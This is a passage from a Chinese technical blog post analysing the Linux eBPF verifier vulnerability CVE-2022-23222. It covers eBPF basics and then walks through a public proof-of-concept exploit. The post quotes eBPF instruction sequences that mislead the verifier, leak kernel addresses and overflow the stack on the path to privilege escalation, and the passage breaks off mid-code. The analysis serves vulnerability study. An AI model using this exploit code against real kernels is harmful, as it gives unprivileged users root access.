<tr>
<td align="center">BPF_ALU64_IMM(OP, DST, IMM)</td>
<td align="center">dst_reg = dst_reg ‘op’ imm32</td>
</tr>
<tr>
<td align="center">BPF_JMP_IMM(OP, DST, IMM, OFF)</td>
<td align="center">if (dst_reg ‘op’ imm32) goto pc + off16</td>
</tr>
<tr>
<td align="center">BPF_LD_MAP_FD(DST, MAP_FD)</td>
<td align="center">dst = map_fd</td>
</tr>
<tr>
<td align="center">BPF_EXIT_INSN()</td>
<td align="center">exit</td>
</tr>
</tbody></table>
<h3 id="3-2-eBPF寄存器"><a href="#3-2-eBPF寄存器" class="headerlink" title="3.2 eBPF寄存器"></a>3.2 eBPF寄存器</h3><p>eBPF 共有 11 个寄存器,其中 R10 是只读的帧指针,剩余 10 个是通用寄存器。</p>
<ul>
<li>R0: 保存函数返回值,及 eBPF 程序退出值</li>
<li>R1 - R5: 传递函数参数,调用函数保存</li>
<li>R6 - R9: 被调用函数保存</li>
<li>R10: 只读的帧指针</li>
</ul>
<h3 id="3-3-eBPF程序类型"><a href="#3-3-eBPF程序类型" class="headerlink" title="3.3 eBPF程序类型"></a>3.3 eBPF程序类型</h3><p>所有 eBPF 程序类型定义在以下枚举类型:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_prog_type {</span><br><span class="line"> BPF_PROG_TYPE_UNSPEC = <span class="number">0</span>,</span><br><span class="line"> BPF_PROG_TYPE_SOCKET_FILTER = <span class="number">1</span>,</span><br><span class="line"> BPF_PROG_TYPE_KPROBE = <span class="number">2</span>,</span><br><span class="line"> BPF_PROG_TYPE_SCHED_CLS = <span class="number">3</span>,</span><br><span class="line"> BPF_PROG_TYPE_SCHED_ACT = <span class="number">4</span>,</span><br><span class="line"> BPF_PROG_TYPE_TRACEPOINT = <span class="number">5</span>,</span><br><span class="line"> BPF_PROG_TYPE_XDP = <span class="number">6</span>,</span><br><span class="line"> BPF_PROG_TYPE_PERF_EVENT = <span class="number">7</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SKB = <span class="number">8</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCK = <span class="number">9</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_IN = <span class="number">10</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_OUT = <span class="number">11</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_XMIT = <span class="number">12</span>,</span><br><span class="line"> BPF_PROG_TYPE_SOCK_OPS = <span class="number">13</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_SKB = <span class="number">14</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_DEVICE = <span class="number">15</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_MSG = <span class="number">16</span>,</span><br><span class="line"> BPF_PROG_TYPE_RAW_TRACEPOINT = <span class="number">17</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCK_ADDR = <span class="number">18</span>,</span><br><span class="line"> BPF_PROG_TYPE_LWT_SEG6LOCAL = <span class="number">19</span>,</span><br><span class="line"> BPF_PROG_TYPE_LIRC_MODE2 = <span class="number">20</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_REUSEPORT = <span class="number">21</span>,</span><br><span class="line"> BPF_PROG_TYPE_FLOW_DISSECTOR = <span class="number">22</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SYSCTL = <span class="number">23</span>,</span><br><span class="line"> BPF_PROG_TYPE_RAW_TRACEPOINT_WRITABLE = <span class="number">24</span>,</span><br><span class="line"> BPF_PROG_TYPE_CGROUP_SOCKOPT = <span class="number">25</span>,</span><br><span class="line"> BPF_PROG_TYPE_TRACING = <span class="number">26</span>,</span><br><span class="line"> BPF_PROG_TYPE_STRUCT_OPS = <span class="number">27</span>,</span><br><span class="line"> BPF_PROG_TYPE_EXT = <span class="number">28</span>,</span><br><span class="line"> BPF_PROG_TYPE_LSM = <span class="number">29</span>,</span><br><span class="line"> BPF_PROG_TYPE_SK_LOOKUP = <span class="number">30</span>,</span><br><span class="line"> BPF_PROG_TYPE_SYSCALL = <span class="number">31</span>,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>下文涉及到的类型只有 BPF_PROG_TYPE_SOCKET_FILTER 。该类型 eBPF 程序通过 setsockopt 附加到指定 socket 上面,对 socket 的流量进行追踪、过滤,可附加的 socket 类型包括 UNIX socket 。</p>
<p>该类型程序的传入参数为结构体 __sk_buff 指针,可通过调用 bpf_skb_load_bytes_relative 辅助函数经由该结构体获取 socket 流量。</p>
<h3 id="3-4-eBPF-map"><a href="#3-4-eBPF-map" class="headerlink" title="3.4 eBPF map"></a>3.4 eBPF map</h3><p>eBPF map 是 eBPF 程序和用户态进行数据交换的媒介。其类型包括:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> bpf_map_type {</span><br><span class="line"> BPF_MAP_TYPE_UNSPEC = <span class="number">0</span>,</span><br><span class="line"> BPF_MAP_TYPE_HASH = <span class="number">1</span>,</span><br><span class="line"> BPF_MAP_TYPE_ARRAY = <span class="number">2</span>,</span><br><span class="line"> BPF_MAP_TYPE_PROG_ARRAY = <span class="number">3</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERF_EVENT_ARRAY = <span class="number">4</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_HASH = <span class="number">5</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_ARRAY = <span class="number">6</span>,</span><br><span class="line"> BPF_MAP_TYPE_STACK_TRACE = <span class="number">7</span>,</span><br><span class="line"> BPF_MAP_TYPE_CGROUP_ARRAY = <span class="number">8</span>,</span><br><span class="line"> BPF_MAP_TYPE_LRU_HASH = <span class="number">9</span>,</span><br><span class="line"> BPF_MAP_TYPE_LRU_PERCPU_HASH = <span class="number">10</span>,</span><br><span class="line"> BPF_MAP_TYPE_LPM_TRIE = <span class="number">11</span>,</span><br><span class="line"> BPF_MAP_TYPE_ARRAY_OF_MAPS = <span class="number">12</span>,</span><br><span class="line"> BPF_MAP_TYPE_HASH_OF_MAPS = <span class="number">13</span>,</span><br><span class="line"> BPF_MAP_TYPE_DEVMAP = <span class="number">14</span>,</span><br><span class="line"> BPF_MAP_TYPE_SOCKMAP = <span class="number">15</span>,</span><br><span class="line"> BPF_MAP_TYPE_CPUMAP = <span class="number">16</span>,</span><br><span class="line"> BPF_MAP_TYPE_XSKMAP = <span class="number">17</span>,</span><br><span class="line"> BPF_MAP_TYPE_SOCKHASH = <span class="number">18</span>,</span><br><span class="line"> BPF_MAP_TYPE_CGROUP_STORAGE = <span class="number">19</span>,</span><br><span class="line"> BPF_MAP_TYPE_REUSEPORT_SOCKARRAY = <span class="number">20</span>,</span><br><span class="line"> BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE = <span class="number">21</span>,</span><br><span class="line"> BPF_MAP_TYPE_QUEUE = <span class="number">22</span>,</span><br><span class="line"> BPF_MAP_TYPE_STACK = <span class="number">23</span>,</span><br><span class="line"> BPF_MAP_TYPE_SK_STORAGE = <span class="number">24</span>,</span><br><span class="line"> BPF_MAP_TYPE_DEVMAP_HASH = <span class="number">25</span>,</span><br><span class="line"> BPF_MAP_TYPE_STRUCT_OPS = <span class="number">26</span>,</span><br><span class="line"> BPF_MAP_TYPE_RINGBUF = <span class="number">27</span>,</span><br><span class="line"> BPF_MAP_TYPE_INODE_STORAGE = <span class="number">28</span>,</span><br><span class="line"> BPF_MAP_TYPE_TASK_STORAGE = <span class="number">29</span>,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>下文使用到的类型包括 BPF_MAP_TYPE_ARRAY 和 BPF_MAP_TYPE_RINGBUF 。</p>
<p>顾名思义,BPF_MAP_TYPE_ARRAY 类似数组,索引为整形,值可为任意长度的内存对象。</p>
<p>BPF_MAP_TYPE_RINGBUF 是环形缓冲区,如果写入的数据来不及读取,导致积累的数据超过缓冲区长度,新数据则会覆盖掉旧数据。</p>
<h3 id="3-5-eBPF辅助函数"><a href="#3-5-eBPF辅助函数" class="headerlink" title="3.5 eBPF辅助函数"></a>3.5 eBPF辅助函数</h3><p>eBPF 辅助函数(eBPF helper)是可在 eBPF 程序中使用的辅助函数。</p>
<p>内核规定了不同类型的eBPF程序可使用哪些辅助函数,比如,bpf_skb_load_bytes_relative 只有 socket 相关的 eBPF 程序可使用。</p>
<p>各 eBPF 辅助函数的函数原型由内核定义,下文使用到的一些辅助函数的原型如下:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">bpf_func_proto</span> <span class="title">bpf_map_lookup_elem_proto</span> = {</span></span><br><span class="line"> .func = bpf_map_lookup_elem,</span><br><span class="line"> .gpl_only = <span class="literal">false</span>,</span><br><span class="line"> .pkt_access = <span class="literal">true</span>,</span><br><span class="line"> .ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL,</span><br><span class="line"> .arg1_type = ARG_CONST_MAP_PTR,</span><br><span class="line"> .arg2_type = ARG_PTR_TO_MAP_KEY,</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">bpf_func_proto</span> <span class="title">bpf_ringbuf_reserve_proto</span> = {</span></span><br><span class="line"> .func = bpf_ringbuf_reserve,</span><br><span class="line"> .ret_type = RET_PTR_TO_ALLOC_MEM_OR_NULL,</span><br><span class="line"> .arg1_type = ARG_CONST_MAP_PTR,</span><br><span class="line"> .arg2_type = ARG_CONST_ALLOC_SIZE_OR_ZERO,</span><br><span class="line"> .arg3_type = ARG_ANYTHING,</span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>可见 bpf_map_lookup_elem 的返回值类型是 RET_PTR_TO_MAP_VALUE_OR_NULL ,bpf_ringbuf_reserve 的返回值类型是RET_PTR_TO_ALLOC_MEM_OR_NULL 。</p>
<p>各 eBPF 辅助函数的功能可通过 man bpf-helpers 命令查看。</p>
<h3 id="3-6-eBPF-verifier"><a href="#3-6-eBPF-verifier" class="headerlink" title="3.6 eBPF verifier"></a>3.6 eBPF verifier</h3><p>eBPF 程序在加载进内核之前,必须通过 eBPF verifier 的检查。只有符合要求的 eBPF 程序才允许被加载进内核,这是为了防止 eBPF 程序对内核进行破坏。</p>
<p>eBPF verifier 对 eBPF 程序的限制包括:</p>
<ul>
<li>不能调用任意的内核函数,只限于内核模块中列出的 eBPF helper 函数</li>
<li>不允许包含无法到达的指令,防止加载无效代码,延迟程序的终止。</li>
<li>限制循环次数,必须在有限次内结束。</li>
<li>栈大小被限制为 MAX_BPF_STACK,截止到内核 5.10.83 版本,被设置为 512。</li>
<li>限制 eBPF 程序的复杂度,verifier 处理的指令数不得超过 BPF_COMPLEXITY_LIMIT_INSNS,截止到内核 5.10.83 版本,被设置为100万。</li>
<li>限制 eBPF 程序对内存的访问,比如不得访问未初始化的栈,不得越界访问 eBPF map 。</li>
</ul>
<h2 id="四、POC分析"><a href="#四、POC分析" class="headerlink" title="四、POC分析"></a>四、POC分析</h2><p>POC 地址为:https://github.com/tr3ee/CVE-2022-23222</p>
<p>漏洞整体利用思路是通过欺骗 eBPF verifier 泄露内核地址,并实现内核任意地址读、写原语,通过任意读原语搜索进程 cred 所在地址,通过任意写原语修改进程 cred 以实现提权。</p>
<h3 id="4-1-前置准备"><a href="#4-1-前置准备" class="headerlink" title="4.1 前置准备"></a>4.1 前置准备</h3><p>创建 2 个 eBPF map ,类型分别为 BPF_MAP_TYPE_ARRAY 及 BPF_MAP_TYPE_RINGBUF。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, <span class="keyword">sizeof</span>(u32), PAGE_SIZE, <span class="number">1</span>);</span><br><span class="line"><span class="keyword">if</span> (ret < <span class="number">0</span>) {</span><br><span class="line">WARNF(<span class="string">"Failed to create comm map: %d (%s)"</span>, ret, strerror(-ret));</span><br><span class="line"><span class="keyword">return</span> ret;</span><br><span class="line">}</span><br><span class="line">ctx->comm_fd = ret;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, <span class="number">0</span>, <span class="number">0</span>, PAGE_SIZE)) < <span class="number">0</span>) {</span><br><span class="line">WARNF(<span class="string">"Could not create ringbuf map: %d (%s)"</span>, ret, strerror(-ret));</span><br><span class="line"><span class="keyword">return</span> ret;</span><br><span class="line">}</span><br><span class="line">ctx->ringbuf_fd = ret;</span><br></pre></td></tr></table></figure>
<p>前者在 POC 中的作用为:</p>
<ol>
<li>和内核交换数据。</li>
<li>泄露其元素的地址。</li>
</ol>
<p>后者的作用则为:</p>
<ol>
<li>和内核交换数据。</li>
<li>通过 bpf_ringbuf_reserve 辅助函数获取 PTR_TO_MEM_OR_NULL 类型指针 。</li>
</ol>
<h3 id="4-2-泄露内核地址"><a href="#4-2-泄露内核地址" class="headerlink" title="4.2 泄露内核地址"></a>4.2 泄露内核地址</h3><p>泄露内核地址的方法为构造特定的 eBFP 程序以利用前述漏洞。</p>
<p>先将 r1 保存到 r9 。r1 在进入 eBPF 程序之前被内核初始化为指向 skb 的指针。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r9 = r1</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_9, BPF_REG_1)</span><br></pre></td></tr></table></figure>
<p>获取 array 指针,保存在 r0 。调试发现,array 指针都是 0xFFFF…10 这种格式。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r0 = bpf_lookup_elem(ctx->comm_fd, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd)</span><br><span class="line">BPF_ST_MEM(BPF_DW, BPF_REG_10, <span class="number">-8</span>, <span class="number">0</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, <span class="number">-4</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_map_lookup_elem)</span><br></pre></td></tr></table></figure>
<p>上一步获取的 r0 类型为 PTR_TO_MAP_VALUE_OR_NULL 。进行以下判断后,在 false 分支 r0 类型就变成 PTR_TO_MAP_VALUE。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// if (r0 == NULL) exit(1)</span></span><br><span class="line">BPF_JMP_IMM(BPF_JNE, BPF_REG_0, <span class="number">0</span>, <span class="number">2</span>)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_0, <span class="number">1</span>)</span><br><span class="line">BPF_EXIT_INSN()</span><br></pre></td></tr></table></figure>
<p>将 array 指针保存进 r8。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r8 = r0</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_8, BPF_REG_0)</span><br></pre></td></tr></table></figure>
<p>调用 bpf_ringbuf_reserve 函数,请求 PAGE_SIZE 的 ringbuf 内存,返回值为 PTR_TO_MEM_OR_NULL 类型指针,属于漏洞中没有过滤的指针类型。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)</span></span><br><span class="line">BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_3, <span class="number">0x00</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_reserve)</span><br></pre></td></tr></table></figure>
<p>复制 r0 到 r1 ,r1 的类型变为 PTR_TO_MEM_OR_NULL ,id 也变成 r0 的 id 。这里提一下,verifier 会维护 eBPF 寄存器的 id 属性,用于追踪指针类型的来源。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r0 = r1</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_0)</span><br></pre></td></tr></table></figure>
<p>之后,r1 自身加 1。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r1 = r1 + 1</span></span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, <span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<p>参考 adjust_ptr_min_max_vals 函数的代码,在指针加减操作中,目标寄存器的 id 和类型会变成指针寄存器的 id 和类型。由于在上一步中 r1 既是目标寄存器也是指针寄存器,其 id 和类型保持不变。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">adjust_ptr_min_max_vals</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *ptr_reg,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct bpf_reg_state *off_reg)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* In case of 'scalar += pointer', dst_reg inherits pointer type and id.</span></span><br><span class="line"><span class="comment"> * The id may be overwritten later if we create a new variable offset.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> dst_reg->type = ptr_reg->type;</span><br><span class="line"> dst_reg->id = ptr_reg->id;</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>检查 r0 是否为 NULL 。事实上,r0 不为 NULL 的情况不可能发生。ringbuf 的大小虽然为 PAGE_SIZE ,但其中一部分用于存储关于 ringbuf 的结构体,剩下的才用于存储数据。因此,请求保留 PAGE_SIZE 的内存不可能实现。经过此步骤后,r0 的类型变为 SCALAR_VALUE ,其值为 0 。那么,与 r0 具有相同 id 的 r1 的类型和值又会如何变化呢?</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }</span></span><br><span class="line">BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, <span class="number">0</span>, <span class="number">5</span>)</span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_0)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, <span class="number">1</span>)</span><br><span class="line">BPF_RAW_INSN(BPF_JMP | BPF_CALL, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, BPF_FUNC_ringbuf_discard)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_0, <span class="number">2</span>)</span><br><span class="line">BPF_EXIT_INSN()</span><br></pre></td></tr></table></figure>
<p>check_cond_jmp_op 是 verifier 中检查 JMP 指令的函数,当 JMP 指令的条件是 *OR_NULL 类型指针和 0 比较时,会通过 mark_ptr_or_null_regs 函数改变不同分支中寄存器的类型。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">check_cond_jmp_op</span><span class="params">(struct bpf_verifier_env *env,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_insn *insn, <span class="keyword">int</span> *insn_idx)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* detect if R == 0 where R is returned from bpf_map_lookup_elem().</span></span><br><span class="line"><span class="comment"> * <span class="doctag">NOTE:</span> these optimizations below are related with pointer comparison</span></span><br><span class="line"><span class="comment"> * which will never be JMP32.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> <span class="keyword">if</span> (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&</span><br><span class="line"> insn->imm == <span class="number">0</span> && (opcode == BPF_JEQ || opcode == BPF_JNE) &&</span><br><span class="line"> reg_type_may_be_null(dst_reg->type)) {</span><br><span class="line"> <span class="comment">/* Mark all identical registers in each branch as either</span></span><br><span class="line"><span class="comment"> * safe or unknown depending R == 0 or R != 0 conditional.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> mark_ptr_or_null_regs(this_branch, insn->dst_reg,</span><br><span class="line"> opcode == BPF_JNE);</span><br><span class="line"> mark_ptr_or_null_regs(other_branch, insn->dst_reg,</span><br><span class="line"> opcode == BPF_JEQ);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>mark_ptr_or_null_regs 函数又调用了 __mark_ptr_or_null_regs 函数,在后者中,所有相同 id 的寄存器都会被 mark_ptr_or_null_reg 函数进行相同的处理。因此,后续 r1 也会变成 SCALAR_VALUE 类型,且 verifier 认为其值为 0 。然而,事实上 r1 的值为 1 。这就是漏洞所在,PTR_TO_MEM_OR_NULL 类型的指针无论经过加减运算变成何值,只要经过是否为 NULL 的判断,在其中一个分支 verifier 都会认为其值为 0 。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">void</span> __mark_ptr_or_null_regs(struct bpf_func_state *state, u32 id,</span><br><span class="line"> <span class="keyword">bool</span> is_null)</span><br><span class="line">{</span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < MAX_BPF_REG; i++)</span><br><span class="line"> mark_ptr_or_null_reg(state, &state->regs[i], id, is_null);</span><br><span class="line"></span><br><span class="line"> ...</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">mark_ptr_or_null_reg</span><span class="params">(struct bpf_func_state *state,</span></span></span><br><span class="line"><span class="function"><span class="params"> struct bpf_reg_state *reg, u32 id,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">bool</span> is_null)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> ...</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (WARN_ON_ONCE(reg->smin_value || reg->smax_value ||</span><br><span class="line"> !tnum_equals_const(reg->var_off, <span class="number">0</span>) ||</span><br><span class="line"> reg->off)) {</span><br><span class="line"> __mark_reg_known_zero(reg);</span><br><span class="line"> reg->off = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (is_null) {</span><br><span class="line"> reg->type = SCALAR_VALUE;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> ...</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>接着,将 r1+8 保存到 r7 。verifier 认为 r7 值为 8 ,实际上 r7 值为 9 。再将 array 指针 r8 加上 0xE0 的值保存到 r10-8 处,之所以加上 0xE0 是为了泄露更多数据,后面会补充说明。</p>
<p><img src="images/01.jpg" alt></p>
<p>通过 bpf_skb_load_bytes_relative 向 r10-16 写入 r7 个字节,即 9 个字节,溢出了 1 个字节。所写入的数据是可控的,可在用户态通过写入 socket 传递进内核态。在这里将控制写入数据为全零数据,即 r10-8 处的字节会被 0x00 覆盖。</p>
<p><img src="images/02.jpg" alt></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// r7 = r1 + 8</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_7, BPF_REG_1)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, <span class="number">8</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// r6 = r8 - 0xE0</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_6, BPF_REG_8)</span><br><span class="line">BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, <span class="number">0xE0</span>)</span><br><span class="line"><span class="comment">// *(u64 *)(r10 - 8) = r6</span></span><br><span class="line">BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, <span class="number">-8</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 这里会将r10-16后r7个字节置零。</span></span><br><span class="line"><span class="comment">// r0 = bpf_skb_load_bytes_relative(r9, 0, r10-16, r7, 0)</span></span><br><span class="line">BPF_MOV64_REG(BPF_REG_1, BPF_REG_9)</span><br><span class="line">BPF_MOV64_IMM(BPF_REG_2, <span class="number">0</span>)</span><br><span 